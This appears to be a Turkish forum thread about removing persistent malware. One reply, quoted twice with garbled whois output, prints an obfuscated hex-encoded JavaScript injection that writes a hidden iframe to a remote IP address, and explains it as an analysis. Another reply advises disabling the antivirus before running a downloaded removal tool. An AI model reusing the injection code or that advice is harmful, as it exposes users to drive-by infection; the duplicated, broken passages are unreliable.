arkadaşlar antivirüs bir tür virüsü bir türlü silemedi. dün genel tarama yaptığımda bilgisayardan 50 virüs 203 trojen buldu. bugün yine bulup duruyor. bu mesajı yazarken anti virüs bişeler bulup silmeye devam ediyor ve şu an 9 virüs 52 trojen bulduğunu gösteriyor. bu bilgisayara nasıl bir virüs bulaştığını bilen bir arkadaş yardım ederse çok iyi olur.
bu virüs benim Canımı sıkmaya başladı :[
- Konbuyu başlatan ö.faruk
- Başlangıç tarihi
http://rapidshare.com/files/217332327/ComboFix.rar.html Bunu İndir Kardesm.. Rar'dan Çıkart Çalıştır.. ancak Çalıştırmadan Önce Antivirüsünü Devre Dışı Bırak.. Bitene Kadar Beklee.. Sorunun Çözülsede.. Çözülmesede Yaz bana..
bu virüsün adı HEUR. kaspersky buluyor ancak silemiyor. kasper resmi sitesinde biri çözüm yolu bulmuş. mrfelaqet arkadaşımızın paylaştığı (http://rapidshare.com/files/217332327/ComboFix.rar.html ) program tek bulabiliyormuş. ancak bu program benim bilgisayarda işe yaramadı. bilgisayar sorunluydu tamirden yeni geldi. kurulum yapıldıktan sonra sistem geri yüklemeyi kapatmış. bende açık olduğunu zannediyordum fakat kapalı. başka bir çare arıyorum.
kardesim valla bi arkadasımdada nod 32 vardı aynı senin dediğin gibi virüs buluyomus silemiyomus norton kur dedim köküne kadar silmis onu kurup silebilirsn..yani kaspersky silmiyosa o programı değismekten baska caren yok ama bana sorarsan nortono öneririm işini görür...
Yanlış bir alarm olup olmadığını kontrol için hemen eplorer de sağ tıklayıp kaynağı görüntüle yaptım… HTML kodlarını yukarıdan aşağıya doğru inerken </body> </html> kodlarından sonra aşağıdaki kodlara denk geldim…
</body>
</html>
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe> ********** function v4804105e4e5e9(v4804105e4eda0){ function v4804105e4f56f () {return 16;} return(parseInt(v4804105e4eda0,v4804105e4f56f()));}function v4804105e5050c(v4804105e50ce5){ function v4804105e524c7 () {var v4804105e52cc0=2; return v4804105e52cc0;} var v4804105e514d9='';for(v4804105e51cd1=0; v4804105e51cd1<v4804105e50ce5.length; v4804105e51cd1+=v4804105e524c7()){ v4804105e514d9+=(String.fromCharCode(v4804105e4e5e9(v4804105e50ce5.substr(v4804105e51cd1, v4804105e524c7()))));}return v4804105e514d9;} ********.write(v4804105e5050c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A363930292B2733383037353537655C272077696474683D3639206865696768743D3130207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); </script>
Tabiki kodları incelemeye aldım. Gördüm ki bu kodlar sayfanın en altına bir iframe açmakta ve gizli olarak açmakta…
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe>
Scriptide bu iframe içerisinde çalıştırıyor. Tabiki “hidden;” kodunu görmüşsünüzdür. Yani gizli olarak açmakta. Kullanıcı hiçbir şekilde fark etmiyor…
Bu iframe içersinde scripti çalıştırıyor. Script ise 77.221.133.190 ip adresine bağlanmakta.
https://tik.lat/Jqs1a [random_nr]
Scrip çalıştığında bu hale geliyor…
İp adresini sorguladığımda ise
[FONT=Verdana, Arial, Helvetica, San-Serif]Results:
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See Whois Database Copyright [url]https://tik.lat/iR1rQ style=”border:0px solid gray;” WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>[/B] BÖYLE DURUMLARDA VAR PİYASADA BU BİLGİLER ALINTIDIR
</body>
</html>
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe> ********** function v4804105e4e5e9(v4804105e4eda0){ function v4804105e4f56f () {return 16;} return(parseInt(v4804105e4eda0,v4804105e4f56f()));}function v4804105e5050c(v4804105e50ce5){ function v4804105e524c7 () {var v4804105e52cc0=2; return v4804105e52cc0;} var v4804105e514d9='';for(v4804105e51cd1=0; v4804105e51cd1<v4804105e50ce5.length; v4804105e51cd1+=v4804105e524c7()){ v4804105e514d9+=(String.fromCharCode(v4804105e4e5e9(v4804105e50ce5.substr(v4804105e51cd1, v4804105e524c7()))));}return v4804105e514d9;} ********.write(v4804105e5050c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A363930292B2733383037353537655C272077696474683D3639206865696768743D3130207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); </script>
Tabiki kodları incelemeye aldım. Gördüm ki bu kodlar sayfanın en altına bir iframe açmakta ve gizli olarak açmakta…
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe>
Scriptide bu iframe içerisinde çalıştırıyor. Tabiki “hidden;” kodunu görmüşsünüzdür. Yani gizli olarak açmakta. Kullanıcı hiçbir şekilde fark etmiyor…
Bu iframe içersinde scripti çalıştırıyor. Script ise 77.221.133.190 ip adresine bağlanmakta.
https://tik.lat/Jqs1a [random_nr]
Scrip çalıştığında bu hale geliyor…
İp adresini sorguladığımda ise
[FONT=Verdana, Arial, Helvetica, San-Serif]Results:
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See Whois Database Copyright [url]https://tik.lat/iR1rQ style=”border:0px solid gray;” WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>[/B] BÖYLE DURUMLARDA VAR PİYASADA BU BİLGİLER ALINTIDIR
- 22 Kas 2008
- 179
- 0
baktın hiç bir şey yapamıyorsun kardeş ve bu virüslerden kurtulamıyorsun ya kullandıgın antivirüs prog. kaldır yanidan yükle baktın gene olmuyor cek bir format kurtul
kardeş zaten hiçbir antivirüs tam koruma sağlayamaz ama senin işin zor zannedersen kayıt sisyeminede yarleşmiş virüs bende düzeltemezsen bi format çek 
hiçbirşeyi kalmaz birde benim tavsiyem bütün virüslerden kurtarmaz ama bence güzel bir program(zamena antilogger ve kaspersky 07 ,08 )2sinide kurmanı tavsiye ederim kaspersin bulamadığını zamena buluyor(önceden sezgisel program zararlı yazılımları seziyor)ve systemine virüssüz şekilde kullanıyorsun)
banada avmo bulaştıydı zamena yüklüydü ama benim dikkatsizliğim usb yi takınca zamena buldu virüsü ama ben izin ver dediydim yanlışlıkla ama şimdik daha rahatım birde kinht felan online oyun vb şifrenin keyloga yakalammamasını istiyorsan bunun işinde çok güzel işe yarıyor hacklenmeden kinht nin tadını çıkar
eğer düzeltemezsen dediğim gibi formatı tavsiye ederim sonrada tüm sistemi D yi felan tarat bişey kalmasın
hadi kolay gelsin...
hiçbirşeyi kalmaz birde benim tavsiyem bütün virüslerden kurtarmaz ama bence güzel bir program(zamena antilogger ve kaspersky 07 ,08 )2sinide kurmanı tavsiye ederim kaspersin bulamadığını zamena buluyor(önceden sezgisel program zararlı yazılımları seziyor)ve systemine virüssüz şekilde kullanıyorsun)banada avmo bulaştıydı zamena yüklüydü ama benim dikkatsizliğim usb yi takınca zamena buldu virüsü ama ben izin ver dediydim yanlışlıkla
ama şimdik daha rahatım birde kinht felan online oyun vb şifrenin keyloga yakalammamasını istiyorsan bunun işinde çok güzel işe yarıyor hacklenmeden kinht nin tadını çıkar eğer düzeltemezsen dediğim gibi formatı tavsiye ederim sonrada tüm sistemi D yi felan tarat bişey kalmasın
hadi kolay gelsin...
- Durum
